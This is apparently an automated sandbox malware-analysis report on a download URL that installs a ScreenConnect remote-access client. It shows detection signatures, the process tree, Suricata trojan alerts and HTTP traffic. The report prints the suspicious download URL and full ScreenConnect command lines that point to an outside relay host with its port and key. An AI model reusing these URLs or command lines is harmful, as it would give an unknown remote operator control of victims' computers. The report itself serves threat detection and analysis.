Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://cp9856.chelokipotlester.icu/Bin/support.Client.exe?h=cp3back96.site&p=8041&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2F0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2FZuAUNQxVB6zV6MkV%2FQ3PQ8O4IKEUzM%2B1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPq

Overview

General Information

Sample URL:https://cp9856.chelokipotlester.icu/Bin/support.Client.exe?h=cp3back96.site&p=8041&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2F0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2
Analysis ID:1544862
Infos:

Detection

ScreenConnect Tool
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

.NET source code references suspicious native API functions
AI detected suspicious URL
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to hide user accounts
Enables network access during safeboot for specific services
Reads the Security eventlog
Reads the System eventlog
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Drops PE files
Drops certificate files (DER)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
PE file contains an invalid checksum
PE file does not import any functions
PE file overlay found
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports
Stores files to the Windows start menu directory
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

Process Tree

  • System is w10x64_ra
  • chrome.exe (PID: 6312 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6960 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1956,i,12778889090336067455,703406671093003371,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6460 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5668 --field-trial-handle=1956,i,12778889090336067455,703406671093003371,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7528 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3360 --field-trial-handle=1956,i,12778889090336067455,703406671093003371,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • support.Client.exe (PID: 7640 cmdline: "C:\Users\user\Downloads\support.Client.exe" MD5: 7B959C1EA179AF2DFC447BF8DB1E2C26)
      • dfsvc.exe (PID: 7692 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe" MD5: B4088F44B80D363902E11F897A7BAC09)
        • ScreenConnect.WindowsClient.exe (PID: 7256 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe" MD5: 5DEC65C4047DE914C78816B8663E3602)
          • ScreenConnect.ClientService.exe (PID: 2212 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=cp3back96.site&p=8041&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2f0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2fZuAUNQxVB6zV6MkV%2fQ3PQ8O4IKEUzM%2b1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2fCUtP6CZ%2f6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2b48fuhT%2fYi9ukTBmorR&r=&i=Untitled%20Session" "1" MD5: DC615E9D8EC81CBF2E2452516373E5A0)
  • chrome.exe (PID: 6616 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://cp9856.chelokipotlester.icu/Bin/support.Client.exe?h=cp3back96.site&p=8041&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2F0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2FZuAUNQxVB6zV6MkV%2FQ3PQ8O4IKEUzM%2B1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2FCUtP6CZ%2F6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2B48fuhT%2FYi9ukTBmorR&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&i=Untitled%20Session&e=Support&y=Guest&r=" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • svchost.exe (PID: 6648 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 5860 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • SgrmBroker.exe (PID: 1828 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • svchost.exe (PID: 2996 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 4884 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • MpCmdRun.exe (PID: 8128 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
      • conhost.exe (PID: 8136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7296 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • ScreenConnect.ClientService.exe (PID: 72 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=cp3back96.site&p=8041&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2f0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2fZuAUNQxVB6zV6MkV%2fQ3PQ8O4IKEUzM%2b1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2fCUtP6CZ%2f6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2b48fuhT%2fYi9ukTBmorR&r=&i=Untitled%20Session" "1" MD5: DC615E9D8EC81CBF2E2452516373E5A0)
    • ScreenConnect.WindowsClient.exe (PID: 1388 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe" "RunRole" "286148cd-317c-42bd-b1b6-847f55f60348" "User" MD5: 5DEC65C4047DE914C78816B8663E3602)
    • ScreenConnect.WindowsClient.exe (PID: 6676 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe" "RunRole" "dab60135-edfb-4837-8e58-b67bfb3544e3" "System" MD5: 5DEC65C4047DE914C78816B8663E3602)
  • rundll32.exe (PID: 3252 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
    C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000011.00000000.1931309778.0000000000782000.00000002.00000001.01000000.0000000C.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
        Process Memory Space: dfsvc.exe PID: 7692JoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
          Process Memory Space: ScreenConnect.WindowsClient.exe PID: 7256JoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
            Process Memory Space: ScreenConnect.ClientService.exe PID: 2212JoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security

              Sigma Signatures

              Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports
              Source: Network ConnectionAuthor: Nasreddine Bencherchali (Nextron Systems): Data: DestinationIp: 192.168.2.16, DestinationIsIpv6: false, DestinationPort: 49715, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Initiated: true, ProcessId: 7692, Protocol: tcp, SourceIp: 37.221.67.19, SourceIsIpv6: false, SourcePort: 443
              Sigma detected: Windows Processes Suspicious Parent Directory
              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 656, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6648, ProcessName: svchost.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-29T19:34:42.936256+010020098971A Network Trojan was detected37.221.67.19443192.168.2.1649721TCP
              2024-10-29T19:34:44.872378+010020098971A Network Trojan was detected37.221.67.19443192.168.2.1649722TCP
              2024-10-29T19:34:50.305537+010020098971A Network Trojan was detected37.221.67.19443192.168.2.1649726TCP
              2024-10-29T19:34:52.144780+010020098971A Network Trojan was detected37.221.67.19443192.168.2.1649727TCP
              2024-10-29T19:34:56.496926+010020098971A Network Trojan was detected37.221.67.19443192.168.2.1649729TCP
              2024-10-29T19:35:01.682027+010020098971A Network Trojan was detected37.221.67.19443192.168.2.1649730TCP
              2024-10-29T19:35:04.113926+010020098971A Network Trojan was detected37.221.67.19443192.168.2.1649731TCP
              2024-10-29T19:35:06.118919+010020098971A Network Trojan was detected37.221.67.19443192.168.2.1649733TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results
              Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49713 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 37.221.67.19:443 -> 192.168.2.16:49715 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 37.221.67.19:443 -> 192.168.2.16:49721 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 37.221.67.19:443 -> 192.168.2.16:49724 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 37.221.67.19:443 -> 192.168.2.16:49725 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 37.221.67.19:443 -> 192.168.2.16:49726 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49728 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 37.221.67.19:443 -> 192.168.2.16:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:49739 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.4.254:443 -> 192.168.2.16:49740 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.219.254:443 -> 192.168.2.16:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49743 version: TLS 1.2
              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.14.dr, ScreenConnect.WindowsFileManager.exe.14.dr
              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Misc\Bootstrapper\Release\ClickOnceRunner.pdb source: support.Client.exe, 0000000D.00000000.1408916929.000000000025B000.00000002.00000001.01000000.00000006.sdmp, Unconfirmed 974768.crdownload.0.dr, chromecache_128.1.dr
              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A346A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000012.00000002.1943559410.0000000002E62000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.WindowsClient.exe, 00000014.00000002.2409619705.0000000003041000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000015.00000002.2004992616.00000000010D0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000015.00000002.2005207241.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll0.14.dr, ScreenConnect.ClientService.dll.14.dr
              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000012.00000000.1939664334.00000000007FD000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.exe.14.dr, ScreenConnect.ClientService.exe0.14.dr
              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A32A8000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000011.00000002.1949508964.000000001BB02000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Windows.dll.14.dr, ScreenConnect.Windows.dll0.14.dr
              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.14.dr, ScreenConnect.WindowsBackstageShell.exe0.14.dr
              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000011.00000000.1931309778.0000000000782000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.14.dr, ScreenConnect.WindowsClient.exe.14.dr
              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.14.dr, ScreenConnect.WindowsBackstageShell.exe0.14.dr
              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A32A4000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000011.00000002.1946388041.00000000028C2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.Client.dll0.14.dr, ScreenConnect.Client.dll.14.dr
              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb] source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A32A4000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000011.00000002.1946388041.00000000028C2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.Client.dll0.14.dr, ScreenConnect.Client.dll.14.dr
              Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdbY/ source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A329F000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000012.00000002.1944397148.0000000005402000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Core.dll0.14.dr, ScreenConnect.Core.dll.14.dr
              Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A329F000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000012.00000002.1944397148.0000000005402000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Core.dll0.14.dr, ScreenConnect.Core.dll.14.dr
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile opened: C:\Users\user\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile opened: C:\Users\user\AppData\Local\Apps\Jump to behavior

              Networking

              barindex
              Enables network access during safeboot for specific services
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeRegistry value created: NULL Service
              Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=cp3back96.site&p=8041&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2f0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2fZuAUNQxVB6zV6MkV%2fQ3PQ8O4IKEUzM%2b1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2fCUtP6CZ%2f6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2b48fuhT%2fYi9ukTBmorR&r=&i=Untitled%20Session HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzipConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzip
              Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzipConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzipConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzip
              Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzipConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzip
              Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzipConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzip
              Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzipConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzip
              Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzipConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzip
              Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 37.221.67.19:443 -> 192.168.2.16:49721
              Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 37.221.67.19:443 -> 192.168.2.16:49729
              Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 37.221.67.19:443 -> 192.168.2.16:49722
              Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 37.221.67.19:443 -> 192.168.2.16:49727
              Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 37.221.67.19:443 -> 192.168.2.16:49726
              Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 37.221.67.19:443 -> 192.168.2.16:49731
              Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 37.221.67.19:443 -> 192.168.2.16:49730
              Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 37.221.67.19:443 -> 192.168.2.16:49733
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
              Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
              Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
              Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
              Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
              Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
              Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
              Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
              Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
              Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
              Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
              Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
              Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
